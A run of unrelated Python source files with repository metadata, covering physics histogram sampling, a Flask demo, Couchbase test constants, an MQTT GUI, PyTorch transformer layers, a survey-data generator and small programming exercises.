        background_hist, xedges, yedges = np.histogram2d(X, Y, bins=(self.nbins,self.nbins), range=[[self.x_min,self.x_max],[self.y_min,self.y_max]], density=None, weights=None)
        background_hist = background_hist.T
        self.values = background_hist
        self.xbins = xedges
        self.ybins = yedges
        # Statistical uncertainty per bin: sqrt(N) (Poisson)
        self.stats_uncert = np.sqrt(self.values)
        # self.normalized_stats_variations = np.random.normal(size=(self.sample_size, 1))
        # self.stats_uncert[self.stats_uncert == 0] = 1
        # Systematic uncertainties + pre-drawn standard-normal variations
        # (only generated for model, not for data).
        self.syst_uncert = []
        self.normalized_syst_variations = []
        self.normalized_syst_variations_for_data_sampling = []
        if not is_data:
            for i in range(self.num_syst):
                # NOTE(review): the i-th systematic is stats_uncert/(i+4);
                # the divisor looks like an ad-hoc tuning choice -- confirm.
                self.syst_uncert.append(self.stats_uncert / (i + 4))
                self.normalized_syst_variations.append(
                    np.random.normal(size=(self.sample_size, 1))
                )
                self.normalized_syst_variations_for_data_sampling.append(
                    np.random.normal(size=(1, 1))
                )
def sample(self, is_data=False):
#The 2D creation of toys
normalized_systs = self.normalized_syst_variations
if is_data:
normalized_systs = self.normalized_syst_variations_for_data_sampling
result = []
for idx_syst, syst in enumerate(self.syst_uncert):
if not self.is_data:
for systs in normalized_systs[idx_syst]:
toy = []
for i in range(self.nbins):
new_values = np.reshape(self.values[i], (1, self.values[i].shape[0]))
new_values = (
new_values
+ np.reshape(syst[i], (1, syst[i].shape[0])) * systs
)
toy.append( np.random.poisson(
np.max([new_values, np.zeros_like(new_values)], axis=0)
))
result.append(np.reshape(toy ,(self.nbins,self.nbins)))
else:
raise ValueError("ERROR: Can not sample from data model.")
return result
def sample_1D(self,values_1d,is_data=False):
if is_data:
normalized_systs = self.normalized_syst_variations_for_data_sampling
result = []
#Recalculate of the uncertanties for the 1D Modell
stats_uncert = np.sqrt(values_1d)
syst_uncert = []
normalized_syst_variations = []
normalized_syst_variations_for_data_sampling = []
if not is_data:
for i in range(self.num_syst):
syst_uncert.append(stats_uncert / (i + 4))
normalized_syst_variations.append(
np.random.normal(size=(self.sample_size, 1))
)
normalized_syst_variations_for_data_sampling.append(
np.random.normal(size=(1, 1))
)
normalized_systs = normalized_syst_variations
if not self.is_data:
new_values = np.reshape(values_1d, (1, values_1d.shape[0]))
for idx_syst, syst in enumerate(syst_uncert):
new_values = (
new_values
+ np.reshape(syst, (1, syst.shape[0])) * normalized_systs[idx_syst]
)
return np.random.poisson(
np.max([new_values, np.zeros_like(new_values)], axis=0)
)
raise ValueError("ERROR: Can not sample from data model.")
@property
def total_uncert(self):
if self.is_data:
return self.stats_uncert
squared_sum = self.stats_uncert * self.stats_uncert
for syst in self.syst_uncert:
squared_sum += syst * syst
return np.sqrt(squared_sum)
def get_data_sample(self,mu,sigma, signal_size=0):
# build signal
Signal = np.random.multivariate_normal(mean=mu,cov=sigma,size=signal_size)
Signal_hist, xedges, yedges = np.histogram2d(Signal[:,0], Signal[:,1], bins=(self.nbins,self.nbins), range=[[self.x_min,self.x_max],[self.y_min,self.y_max]], density=None, weights=None)
Signal_hist = Signal_hist.T
combined_hist = self.values + Signal_hist
return combined_hist
| CMSMUSiC/HDiv | Build_gc11/data_models_2D.py | data_models_2D.py | py | 5,632 | python | en | code | 0 | github-code | 90 |
28758383637 | '''Crie um programa que leia o ano de nascimento de sete pessoas. No final, mostre quantas pessoas ainda não atingiram a maioridade e quantas já são maiores.
'''
from datetime import date

# Read the birth year of 7 people and count how many are of legal age.
ano_atual = date.today().year
total_maior = 0   # count of people at or above the age threshold
total_menor = 0   # count of people below the threshold
for pessoas in range(1, 8):
    data_de_nascimento = int(input(f'Em que ano a {pessoas}ª pessoa nasceu? '))
    idade = ano_atual - data_de_nascimento
    # NOTE(review): threshold is 21 here, while the exercise text says
    # "maioridade" (legal majority, 18 in Brazil) — confirm intended cutoff.
    if idade >= 21:
        total_maior += 1
    else:
        total_menor += 1
print(f'Ao todo temos {total_maior} pessoas maiores de idade')
print(f'E temos {total_menor} menores de idade')
| robsonlnx/exercicios | ex054.py | ex054.py | py | 606 | python | pt | code | 0 | github-code | 90 |
39711008999 | NS_SERVER_TIMEOUT = 120
STANDARD_BUCKET_PORT = 11217
COUCHBASE_SINGLE_DEFAULT_INI_PATH = "/opt/couchbase/etc/couchdb/default.ini"
MEMBASE_DATA_PATH = "/opt/membase/var/lib/membase/data/"
MEMBASE_VERSIONS = ["1.5.4", "1.6.5.4-win64", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2"]
COUCHBASE_DATA_PATH = "/opt/couchbase/var/lib/couchbase/data/"
# remember update WIN_REGISTER_ID also when update COUCHBASE_VERSION
COUCHBASE_VERSIONS = ["1.8.0r", "1.8.0", "1.8.1", "2.0.0", "2.0.1", "2.0.2", "2.1.0", "2.1.1", "2.2.0",
"2.2.1", "2.5.0", "2.5.1", "2.5.2", "3.0.0", "3.0.1", "3.0.2", "3.5.0"]
COUCHBASE_VERSION_2 = ["2.0.0", "2.0.1", "2.0.2", "2.1.0", "2.1.1", "2.2.0", "2.2.1", "2.5.0", "2.5.1",
"2.5.2"]
COUCHBASE_VERSION_3 = ["3.0.0", "3.0.1", "3.0.2", "3.5.0"]
WIN_CB_VERSION_3 = ["3.0.0", "3.0.1", "3.0.2", "3.5.0"]
WIN_MEMBASE_DATA_PATH = '/cygdrive/c/Program\ Files/Membase/Server/var/lib/membase/data/'
WIN_COUCHBASE_DATA_PATH = '/cygdrive/c/Program\ Files/Couchbase/Server/var/lib/couchbase/data/'
WIN_CB_PATH = "/cygdrive/c/Program Files/Couchbase/Server/"
WIN_MB_PATH = "/cygdrive/c/Program Files/Membase/Server/"
LINUX_CB_PATH = "/opt/couchbase/"
WIN_REGISTER_ID = {"1654":"70668C6B-E469-4B72-8FAD-9420736AAF8F", "170":"AF3F80E5-2CA3-409C-B59B-6E0DC805BC3F", \
"171":"73C5B189-9720-4719-8577-04B72C9DC5A2", "1711":"73C5B189-9720-4719-8577-04B72C9DC5A2", \
"172":"374CF2EC-1FBE-4BF1-880B-B58A86522BC8", "180":"D21F6541-E7EA-4B0D-B20B-4DDBAF56882B", \
"181":"A68267DB-875D-43FA-B8AB-423039843F02", "200":"9E3DC4AA-46D9-4B30-9643-2A97169F02A7", \
"201":"4D3F9646-294F-4167-8240-768C5CE2157A", "202":"7EDC64EF-43AD-48BA-ADB3-3863627881B8",
"210":"7EDC64EF-43AD-48BA-ADB3-3863627881B8", "211":"7EDC64EF-43AD-48BA-ADB3-3863627881B8",
"220":"CC4CF619-03B8-462A-8CCE-7CA1C22B337B", "221":"3A60B9BB-977B-0424-2955-75346C04C586",
"250":"22EF5D40-7518-4248-B932-4536AAB7293E", "251":"AB8A4E81-D502-AE14-6979-68E4C4658CF7",
"252":"6E10D93C-76E0-DCA4-2111-73265D001F56",
"300":"3D361F67-7170-4CB4-494C-3E4E887BC0B3", "301":"3D361F67-7170-4CB4-494C-3E4E887BC0B3",
"302":"DD309984-2414-FDF4-11AA-85A733064291", "305":"24D9F882-481C-2B04-0572-00B273CE17B3"}
""" This "220":"CC4CF619-03B8-462A-8CCE-7CA1C22B337B" is for build 2.2.0-821 and earlier
The new build register ID for 2.2.0-837 id is set in create_windows_capture_file in remote_util """
VERSION_FILE = "VERSION.txt"
MIN_COMPACTION_THRESHOLD = 2
MAX_COMPACTION_THRESHOLD = 100
MIN_TIME_VALUE = 0
MAX_TIME_MINUTE = 59
MAX_TIME_HOUR = 23
NUM_ERLANG_THREADS = 16
LINUX_COUCHBASE_BIN_PATH = "/opt/couchbase/bin/"
WIN_COUCHBASE_BIN_PATH = '/cygdrive/c/Program\ Files/Couchbase/Server/bin/'
WIN_COUCHBASE_BIN_PATH_RAW = 'C:\Program\ Files\Couchbase\Server\\bin\\'
WIN_TMP_PATH = '/cygdrive/c/tmp/'
MAC_COUCHBASE_BIN_PATH = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/bin/"
MAC_CB_PATH = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/"
LINUX_COUCHBASE_LOGS_PATH = '/opt/couchbase/var/lib/couchbase/logs'
WIN_COUCHBASE_LOGS_PATH = '/cygdrive/c/Program\ Files/Couchbase/Server/var/lib/couchbase/logs/'
MISSING_UBUNTU_LIB = ["libcurl3"]
LINUX_GOPATH = '/root/tuq/gocode'
WINDOWS_GOPATH = '/cygdrive/c/tuq/gocode'
LINUX_GOROOT = '/root/tuq/go'
WINDOWS_GOROOT = '/cygdrive/c/Go'
LINUX_STATIC_CONFIG = '/opt/couchbase/etc/couchbase/static_config'
LINUX_LOG_PATH = '/opt'
LINUX_CAPI_INI = '/opt/couchbase/etc/couchdb/default.d/capi.ini'
LINUX_CONFIG_FILE = '/opt/couchbase/var/lib/couchbase/config/config.dat'
LINUX_MOXI_PATH = '/opt/moxi/bin/'
LINUX_CW_LOG_PATH = "/opt/couchbase/var/lib/couchbase/tmp/"
MAC_CW_LOG_PATH = "/Applications/Couchbase\ Server.app/Contents/Resources/couchbase-core/var/lib/couchbase/tmp"
WINDOWS_CW_LOG_PATH = "/cygdrive/c/Program\ Files/Couchbase/Server/var/lib/couchbase/tmp/"
CLI_COMMANDS = ["cbbackup", "cbbrowse_logs", "cbcollect_info", "cbcompact", "cbdump-config", "cbenable_core_dumps.sh", \
"cbepctl", "cbhealthchecker", "cbrecovery", "cbreset_password", "cbrestore", "cbsasladm", "cbstats", \
"cbtransfer", "cbvbucketctl", "cbworkloadgen", "couchbase-cli", "couchbase-server", "couch_compact", \
"couchdb", "couch_dbdump", "couch_dbinfo", "couchjs", "couch_view_file_merger", "couch_view_file_sorter", \
"couch_view_group_cleanup", "couch_view_group_compactor", "couch_view_index_builder", "couch_view_index_updater", \
"ct_run", "curl", "curl-config", "derb", "dialyzer", "dump-guts", "epmd", "erl", "erlc", "escript", "genbrk", \
"gencfu", "gencnval", "genctd", "generate_cert", "genrb", "icu-config", "install", "makeconv", "mctimings", \
"memcached", "moxi", "reports", "sigar_port", "sqlite3", "to_erl", "tools", "typer", "uconv", "vbmap"]
# old url MV_LATESTBUILD_REPO = "http://builds.hq.northscale.net/latestbuilds/"
MV_LATESTBUILD_REPO = "http://latestbuilds.hq.couchbase.com/"
| DavidAlphaFox/couchbase | testrunner/lib/testconstants.py | testconstants.py | py | 5,156 | python | en | code | 0 | github-code | 90 |
4980857626 | import flask
from flask import Flask, render_template, request, Response
from Main.config import Config
from Main.project.forms import MessageForm
# Create the Flask application and load settings (e.g. SECRET_KEY for WTForms)
# from the project's Config class.
app = Flask(__name__)
app.config.from_object(Config)
@app.route("/", methods=['get', 'post'])
def index():
    """Render the chat page; reply 'Hello!' to 'hi' and small talk otherwise."""
    server_message = ''
    if request.method != 'POST':
        server_message = 'Enter your message:'
    else:
        client_message = request.form.get('message')
        if client_message == 'hi':
            server_message = 'Hello!'
        elif client_message != '':
            server_message = "How are you?"
    return render_template('index.html', message=server_message)
# In-memory news store shared by all requests (title -> content).
page_news = {'first news': "test text"}


@app.route("/news", methods=['get', 'post'])
def news():
    """List news items; on POST add a new one or abort with 404 if fields are empty."""
    if request.method == 'POST':
        title = request.form.get('title')
        content = request.form.get('content')
        if not (title and content):
            return flask.abort(404, 'Неверные параметры запроса - пустые title и/или content')
        page_news[title] = content
    return render_template("news.html", news=page_news)
@app.route("/message", methods=['get', 'post'])
def message():
    """Render the message page with a fresh MessageForm instance."""
    return render_template("message.html", form=MessageForm())
@app.route('/old/')
def old_index():
    """Render the legacy landing page with no template context."""
    return render_template('old_index.html')
@app.route('/old/<float:x>/')
def double_x(x):
    """Show *x* doubled on the legacy page (x is parsed from the URL as float)."""
    doubled = x * 2
    caption = f"Ваше число {x}, умноженное на 2:"
    return render_template('old_index.html', text=caption, number=doubled)
# @app.route('/<a>/<b>/<c>')
# def middle(a, b, c):
# return render_template('index.html', a=a, b=b, c=c)
@app.route('/old/<float:a>/<operator>/<float:c>/')
def calculate(a, operator, c):
    """Render the legacy page with two operands and an operator string.

    Display only — no arithmetic is performed server-side; the template
    receives the raw URL components.
    """
    return render_template('old_index.html', a=a, operator=operator, c=c)
if __name__ == '__main__':
    # Development server only — debug=True must not be used in production.
    app.run(host='127.0.0.1', port=5000, debug=True)
| skirdapa/Stepic_Web_Framework_Flask_Introduction | Main/app.py | app.py | py | 1,998 | python | en | code | 0 | github-code | 90 |
3994698248 | import sys
input = sys.stdin.readline
def iq(N, arr):
    """Guess the next term of a sequence assumed to follow a[i+1] = a[i]*x + y.

    Prints the next term when integer x, y fit every adjacent pair, "B" when
    they don't, and "A" when the sequence is too short to be determined
    (N == 1, or N == 2 with two different values).
    """
    if N == 1:
        print("A")
    elif N == 2:
        # Two equal terms pin down a constant sequence; otherwise ambiguous.
        print(arr[0] if arr[0] == arr[1] else "A")
    elif N > 2:
        first, second, third = arr[0], arr[1], arr[2]
        # Solve a1 = a0*x + y and a2 = a1*x + y for integer x, y
        # (integer division; a bad fit is caught by the verification loop).
        slope = 0 if second == first else (third - second) // (second - first)
        offset = second - first * slope
        for i in range(N - 1):
            if arr[i] * slope + offset != arr[i + 1]:
                print("B")
                return
        print(arr[N - 1] * slope + offset)
if __name__ == "__main__":
    # First line: N; second line: the N sequence terms, space-separated.
    N = int(input().strip())
    iq(N, list(map(int, input().strip().split())))
| WonyJeong/algorithm-study | WonyJeong/Soma/1111.py | 1111.py | py | 669 | python | en | code | 2 | github-code | 90 |
18380554629 | import math
A, B, C, D = map(int, input().split())
cd = (C * D) // math.gcd(C, D)
pac, qac = divmod(A, C)
pad, qad = divmod(A, D)
pacd, qacd = divmod(A, cd)
pbc, qbc = divmod(B, C)
pbd, qbd = divmod(B, D)
pbcd, qbcd = divmod(B, cd)
pac = pac - 1 if qac == 0 else pac
pad = pad - 1 if qad != 0 else pad
pacd = pacd - 1 if qacd != 0 else pacd
ans = (pbc + pbd - pbcd) - (pac + pad - pacd)
print(B - A - ans + 1)
| Aasthaengg/IBMdataset | Python_codes/p02995/s978500214.py | s978500214.py | py | 417 | python | en | code | 0 | github-code | 90 |
39090762329 | import csv
from telegram import Update
from telegram.ext import CallbackContext
import os.path
db = []   # in-memory copy of the CSV rows (header row excluded)
id = 0    # last used record id (currently unused; see commented code below)


def init_db(file_name='DB.csv'):
    """(Re)load *file_name* into the global ``db`` list, creating the file if absent.

    Rows whose first field is the literal header 'ID' are skipped.
    Always returns None.
    """
    global db
    db.clear()
    if not os.path.exists(file_name):
        # First run: create an empty database file.
        open(file_name, 'w', newline='').close()
        return None
    with open(file_name, 'r', newline='') as csv_file:
        for row in csv.reader(csv_file):
            if row[0] != 'ID':
                db.append(row)
            # if(int(row[0]) > id):
            #     id = int(row[0])
    return None
def show_db(update: Update, context: CallbackContext, file_name='DB.csv'):
    # Print the pipe-delimited DB file: header row first, then each data row.
    # NOTE(review): init_db() parses the same file with the default comma
    # delimiter while this reader uses '|' — confirm which format DB.csv
    # actually uses.  The `update`/`context` parameters are unused here
    # (presumably kept for the telegram handler signature).
    with open(file_name) as f:
        reader = csv.reader(f,delimiter='|')
        headers = next(reader)
        print(headers)
        for row in reader:
            print(row)
def write_db(update: Update, context: CallbackContext):
    # Interactively collect one record (name, surname, phone, comment) and
    # append it pipe-separated to DB.csv.
    # NOTE(review): this appends fields onto the global `db` list, which
    # init_db() fills with whole rows — so db[0]..db[4] are only this record
    # on the very first call; later calls (or a prior init_db) write the
    # wrong values.  Early returns also leave partially-appended fields in db.
    global id
    global db
    id += 1
    db.append(id)
    first_name = input('Введите имя: ')
    if(first_name == ''):
        print('Поле не может быть пустым!')
        return
    db.append(first_name)
    last_name = input('Введите Фамилию: ')
    if(last_name == ''):
        print('Поле не может быть пустым!')
        return
    db.append(last_name)
    phone_num = give_int('Введите телефон: ')
    # NOTE(review): give_int() always returns an int, so this '' check is dead code.
    if(phone_num == ''):
        print('Поле не может быть пустым!')
        return
    db.append(phone_num)
    comment = input('Введите комментарий: ')
    db.append(comment)
    file = open ('DB.csv', 'a')
    file.write(f'{db[0]}|{db[1]}|{db[2]}|{db[3]}|{db[4]}\n')
    file.close()
def give_int(input_number) -> int:
    """Prompt with *input_number* repeatedly until the user types a valid integer."""
    while True:
        try:
            return int(input(input_number))
        except ValueError:
            print('Вы ввели не число. Введите число.')
# def creating():
# file = open ('DB.csv', 'w')
# # with open (file, 'a') as data_csv:
# file.write('id | first_name | last_name | phone_num | comment\n')
# creating()
| Dimonchik39/home_work_10 | function.py | function.py | py | 2,265 | python | en | code | 0 | github-code | 90 |
23097673989 | import paho.mqtt.client as mqtt
import tkinter as tk
# Public test broker and the topic this subscriber listens to.
mqttBroker = "broker.emqx.io"
subsTopic = "StudyClub/Restu/Publis"
# Callback invoked when the connection to the MQTT broker succeeds.
def on_connect(client, userdata, flags, rc):
    status_label.config(text='Terhubung ke broker MQTT dengan kode: ' + str(rc))
    client.subscribe(subsTopic) # Subscribe to the desired topic
# Callback invoked for every message received from the broker;
# appends topic and payload to the GUI text box.
def on_message(client, userdata, msg):
    output_text.insert(tk.END, 'Pesan diterima pada topik: ' + msg.topic + '\n')
    output_text.insert(tk.END, 'Isi pesan: ' + str(msg.payload.decode()) + '\n')
    output_text.insert(tk.END, '--------------------------------------\n')
    output_text.see(tk.END) # Auto-scroll to the bottom
# Initialise the MQTT client.
client = mqtt.Client()
# Register the callback functions.
client.on_connect = on_connect
client.on_message = on_message
# Connect to the MQTT broker (port 1883, 60 s keepalive).
client.connect(mqttBroker, 1883, 60)
# Disconnect and close the window.
def exit_program():
    client.disconnect()
    root.destroy()
# Build the GUI with Tkinter.
root = tk.Tk()
root.title('Aplikasi MQTT Subscriber')
# Status label.
status_label = tk.Label(root, text='Status: ')
status_label.pack()
# Topic label.
topic_label = tk.Label(root, text='Topik: ' + subsTopic)
topic_label.pack()
# Output text box for received messages.
output_text = tk.Text(root, height=10, width=40)
output_text.pack()
# Exit button.
exit_button = tk.Button(root, text='Keluar', command=exit_program)
exit_button.pack()
# Run the MQTT network loop in a background thread while Tk owns the main loop.
client.loop_start()
root.mainloop()
# Stop the MQTT loop once the window is closed.
client.loop_stop()
| Nuur-R/MyLab-EmbeddedProgram | python_client/MqttSubs_GUI.py | MqttSubs_GUI.py | py | 1,657 | python | id | code | 0 | github-code | 90 |
23061862097 | import get_psql_table
import pandas as pd
import matplotlib.pyplot as plt
def plot_queue_length_table(system_name,agreggate_by):
    """Plot queue-length deltas for *system_name*, resampled by *agreggate_by*.

    Pulls three event tables from the database: task submissions (+1 to the
    queue), run starts (-1), and run stops (exittype 0/5 mapped to +1 —
    presumably restarts/requeues; confirm against the scheduler semantics).
    Events are merged, summed per timestamp, resampled (e.g. 'W' = weekly)
    and plotted.  NOTE(review): the cumulative sum that would turn deltas
    into an actual queue length is commented out below.
    """
    indate_table = get_psql_table.get_table('tasks.indate as time',system_name+'.tasks')
    indate_table = add_queue_column(indate_table,1)
    rundate_table = get_psql_table.get_table('runs.rundate as time',system_name+'.runs')
    rundate_table = add_queue_column(rundate_table,-1)
    stopdate_table = get_psql_table.get_table('runs.stopdate as time, runs.exittype', system_name+'.runs')
    stopdate_table = add_queue_column(stopdate_table,0)
    stopdate_table = alter_exittype(stopdate_table,1)
    stopdate_table = drop_exittype_column(stopdate_table)
    print(stopdate_table)
    queue_length_table = concatenate_tables(indate_table,rundate_table,stopdate_table)
    queue_length_table = queue_length_table.sort_values(by=['time'])
    queue_length_table = queue_length_table.groupby(['time']).sum()
    queue_length_table = queue_length_table.resample(agreggate_by).sum()
    # queue_length_table.queue_length = queue_length_table.queue_length.cumsum()
    queue_length_table.plot()
    plt.show()
def alter_exittype(table, for_what_number):
    """Set queue_length to *for_what_number* on rows with exittype 0 or 5.

    Mutates *table* in place and returns it.
    """
    selected = table['exittype'].isin([0, 5])
    table.loc[selected, 'queue_length'] = for_what_number
    return table
def add_queue_column(table, default_value):
    """Add a 'queue_length' column filled with *default_value*; mutates and returns *table*."""
    table['queue_length'] = default_value
    return table
def drop_exittype_column(table):
    """Return a copy of *table* without its 'exittype' column (input is not modified)."""
    return table.drop(columns='exittype')
def concatenate_tables(table_1, table_2, table_3):
    """Concatenate the three frames row-wise, in order (duplicate indices kept).

    Improvement: one pd.concat call instead of two chained ones — a single
    pass with no intermediate frame, same result.
    """
    return pd.concat([table_1, table_2, table_3])
plot_queue_length_table('mvs10p','W') | SergeiShumilin/pyJSCC | JSCC_data_base_analisis/queue_length_improved.py | queue_length_improved.py | py | 1,696 | python | en | code | 0 | github-code | 90 |
12830586822 | import torch
from torch import nn
import torch.nn.functional as F
class Feedforward(nn.Module):
    """Two-layer MLP: Linear -> GELU -> Linear.

    Note: the activation attribute is historically named ``relu`` although
    it is a GELU; the name is kept for attribute/checkpoint compatibility.
    """
    def __init__(self, input_size, hidden_size, output_size):
        super(Feedforward, self).__init__()
        self.input_size = input_size
        self.hidden_size = hidden_size
        self.output_size = output_size
        self.fc1 = nn.Linear(self.input_size, self.hidden_size)
        self.relu = nn.GELU()
        self.fc2 = nn.Linear(self.hidden_size, self.output_size)
    def forward(self, x):
        return self.fc2(self.relu(self.fc1(x)))
class MultiHeadSelfAttention(nn.Module):
    """Standard multi-head scaled dot-product self-attention over (B, T, E) inputs."""
    def __init__(self, embed_dim, num_heads=8):
        super(MultiHeadSelfAttention, self).__init__()
        self.embed_dim = embed_dim
        self.num_heads = num_heads
        if embed_dim % num_heads != 0:
            raise ValueError(
                f"embedding dimension = {embed_dim} should be divisible by number of heads = {num_heads}"
            )
        self.projection_dim = embed_dim // num_heads
        # One projection per role; creation order kept for reproducible init.
        self.query = nn.Linear(embed_dim, embed_dim)
        self.key = nn.Linear(embed_dim, embed_dim)
        self.value = nn.Linear(embed_dim, embed_dim)
        self.combine_heads = nn.Linear(embed_dim, embed_dim)
    def attention(self, query, key, value):
        """Scaled dot-product attention: softmax(Q K^T / sqrt(d)) V."""
        scores = torch.matmul(query, key.transpose(-1, -2))
        scale = torch.sqrt(torch.tensor(key.shape[-1], dtype=torch.float32))
        weights = F.softmax(scores / scale, dim=-1)
        return torch.matmul(weights, value)
    def separate_heads(self, x, batch_size):
        """(B, T, E) -> (B, H, T, E/H)."""
        split = x.reshape(batch_size, -1, self.num_heads, self.projection_dim)
        return split.transpose(1, 2)
    def forward(self, inputs):
        # inputs: (batch_size, seq_len, embed_dim)
        batch_size = inputs.shape[0]
        per_head = [
            self.separate_heads(proj(inputs), batch_size)
            for proj in (self.query, self.key, self.value)
        ]
        attended = self.attention(*per_head).transpose(1, 2)
        merged = attended.reshape(batch_size, -1, self.embed_dim)
        return self.combine_heads(merged)
class DecoderOnlyLayer(nn.Module):
    """One transformer block: self-attention then feed-forward, each wrapped as
    x + LayerNorm(sublayer(x)) — note the norm is applied to the sublayer
    output, not the input."""
    def __init__(self, d_model, n_head, d_ff=None):
        super().__init__()
        d_ff = 4 * d_model if d_ff is None else d_ff
        self.attn = MultiHeadSelfAttention(d_model, n_head)
        self.norm1 = nn.LayerNorm(d_model)
        self.ff = Feedforward(d_model, d_ff, d_model)
        self.norm2 = nn.LayerNorm(d_model)
    def forward(self, x):
        x = x + self.norm1(self.attn(x))
        return x + self.norm2(self.ff(x))
class DecoderOnly(nn.Module):
    """Decoder-only transformer: embed -> additive position signal -> blocks -> logits."""
    def __init__(self, n_inputs, n_outputs, n_layers, d_model, n_head):
        super().__init__()
        self.embed = nn.Linear(n_inputs, d_model)
        # BUG FIX: the blocks were stored in a plain Python list, which hides
        # them from PyTorch — they were excluded from .parameters() (so the
        # optimizer never trained them), from .to()/.cuda(), and from
        # state_dict.  nn.ModuleList registers them properly.
        self.layers = nn.ModuleList(
            DecoderOnlyLayer(d_model, n_head) for _ in range(n_layers)
        )
        self.out = nn.Linear(d_model, n_outputs)
    def forward(self, x):
        x = self.embed(x)
        # Additive positional signal injected into channel 0 (kept from the
        # original; note the in-place += on the embedding output).
        pos = torch.linspace(0, x.shape[1], x.shape[1]).to(x.device)
        x[:, :, 0] += pos
        for l in self.layers:
            x = l(x)
        logits = self.out(x)
        return logits
class MultiLayerFeedForward(nn.Module):
    """MLP with GELU activations: in_layer -> n_layers hidden Linears -> out_layer."""
    def __init__(self, n_layers, n_inputs, d_model, n_outputs):
        super().__init__()
        self.in_layer = nn.Linear(n_inputs, d_model)
        self.layers = nn.ModuleList([nn.Linear(d_model, d_model) for _ in range(n_layers)])
        self.out_layer = nn.Linear(d_model, n_outputs)
    def forward(self, x):
        hidden = F.gelu(self.in_layer(x))
        for layer in self.layers:
            hidden = F.gelu(layer(hidden))
        return self.out_layer(hidden)
class TestModel(nn.Module):
    # NOTE(review): `gelu` and `ff2` are constructed but unused — forward()
    # only applies ff1 (the chained variant is commented out below).
    # Presumably experiment scaffolding; confirm before deleting, since
    # removing them changes parameter-init order and state_dict keys.
    def __init__(self, n_inputs, d_model, n_outputs):
        super().__init__()
        self.ff1 = Feedforward(n_inputs, d_model, n_outputs)
        self.gelu = nn.GELU()
        self.ff2 = Feedforward(d_model, d_model, n_outputs)
    def forward(self, x):
        return self.ff1(x)
        #return self.ff2(self.gelu(self.ff1(x)))
16771423376 | import random as rd
import csv
# Dicionário com as informações a serem selecionadas
dic = {
"idade": ['18-24 anos', '25-35 anos', '36-49 anos', 'Mais de 50 anos'],
"genero": ["Masculino", "Feminino", "Outros", "Prefiro não dizer"],
"estado": ['Acre', 'Alagoas', 'Amapa', 'Amazonas', 'Bahia', 'Ceara', 'Distrito Federal', 'Espirito Santo',
'Goias', 'Maranhao', 'Mato Grosso', 'Mato Grosso do Sul', 'Minas Gerais', 'Para', 'Paraiba', 'Parana',
'Pernambuco', 'Piaui', 'Rio de Janeiro', 'Rio Grande do Norte', 'Rio Grande do Sul', 'Rondonia', 'Roraima',
'Santa Catarina', 'Sao Paulo', 'Sergipe', 'Tocantins'],
"frequencia": ['Diariamente', '2-4 vezes na semana', 'Semanalmente', 'Quinzenalmente'],
"combustivel": ['Gasolina comum', 'Gasolina Aditivada', 'GNV', 'Etanol', 'Diesel', 'Elétrico'],
"abastecimento": ['Sempre completo', 'Completo as vezes', 'Conforme o uso'],
"renda": ['Lazer', 'Locomoção para o trabalho', 'Principal fonte de renda'],
"posto": ['Ipiranga', 'BR', 'Shell', 'Petrobras', 'Texaco', 'Ale'],
"importancia": ['Preço', 'Localização', 'Qualidade do combustível', 'Loja de Conveniência', 'Atendimento', 'Serviços Adicionais'],
"fidelidade-postos": ['Sim', 'Não'],
"aplicativo": ['Conheço mas não utilizo', 'Conheço e utilizo', 'Não conheço', 'Utilizo outros'],
"motivo": ['Não utilizo aplicativos/programas de fidelidade', 'Descontos em abastecimento/serviços', 'Cashback'],
"conveniencia": ['Sim', 'Não'],
"classificacao": ['0', '1', '2', '3', '4', '5']
}
# Função que gera os dados de forma aleatória e salva em um novo dicionário
def gerar_dados():
dados = {}
dados['idade'] = dic['idade'][rd.randint(0, len(dic['idade']))-1]
dados['genero'] = dic['genero'][rd.randint(0, len(dic['genero']))-1]
dados['estado'] = dic['estado'][rd.randint(0, len(dic['estado']))-1]
dados['frequencia'] = dic['frequencia'][rd.randint(0, len(dic['frequencia']))-1]
dados['combustivel'] = dic['combustivel'][rd.randint(0, len(dic['combustivel']))-1]
dados['abastecimento'] = dic['abastecimento'][rd.randint(0, len(dic['abastecimento']))-1]
dados['renda'] = dic['renda'][rd.randint(0, len(dic['renda']))-1]
dados['posto'] = dic['posto'][rd.randint(0, len(dic['posto']))-1]
dados['importancia'] = dic['importancia'][rd.randint(0, len(dic['importancia']))-1]
dados['fidelidade-postos'] = dic['fidelidade-postos'][rd.randint(0, len(dic['fidelidade-postos']))-1]
dados['aplicativo'] = dic['aplicativo'][rd.randint(0, len(dic['aplicativo']))-1]
dados['motivo'] = dic['motivo'][rd.randint(0, len(dic['motivo']))-1]
dados['conveniencia'] = dic['conveniencia'][rd.randint(0, len(dic['conveniencia']))-1]
dados['classificacao'] = dic['classificacao'][rd.randint(0, len(dic['classificacao']))-1]
return dados
# Função que salva os dados gerados em um arquivo CSV
def gerar_linha_csv():
dados = gerar_dados()
with open('respostas.csv', 'a', newline='', encoding='utf-8') as arquivo:
escrever = csv.writer(arquivo)
escrever.writerow([dados['idade'], dados['genero'], dados['estado'],
dados['frequencia'], dados['combustivel'], dados['abastecimento'], dados['renda'],
dados['posto'], dados['importancia'], dados['fidelidade-postos'],dados['aplicativo'],
dados['motivo'], dados['conveniencia'], dados['classificacao']])
# Função que define a quantidade de linhas a serem geradas
def salvar_dados(qtd):
for i in range(qtd):
gerar_linha_csv()
# Chamamento da função onde a quantidade de linhas a serem geradas deve ser informada dentro dos parênteses
salvar_dados()
| ViniVin1/projeto-ipiranga | gerar-respostas.py | gerar-respostas.py | py | 3,794 | python | pt | code | 0 | github-code | 90 |
23695297922 | import pandas as pd
import pandas_datareader.data as web
import numpy as np
import matplotlib.pyplot as plt
# NIKKEI225のデータを取得
df = web.DataReader("NIKKEI225", 'fred', '1990-01-01', '2023-06-08')
# 対数変換を行う
df['LogReturn'] = np.log(df['NIKKEI225']).diff()
# プロット
plt.figure(figsize=(10, 5))
plt.plot(df.index, df['LogReturn'], label='NIKKEI225 Log Returns')
plt.title('NIKKEI225 Log Returns')
plt.xlabel('Date')
plt.ylabel('Log Return')
plt.legend()
plt.grid(True)
plt.show()
| Kouhei-Takagi/PythonAlmostEveryday | N225LogTrend/main.py | main.py | py | 514 | python | en | code | 1 | github-code | 90 |
18221398089 | n=int(input())
y=list(map(int,input().split()))
from collections import Counter
lhs=Counter([j+y[j] for j in range(n)])
rhs=Counter([j-y[j] for j in range(n)])
count=0
for i in lhs:
if i in rhs:
count+=lhs[i]*rhs[i]
print(count)
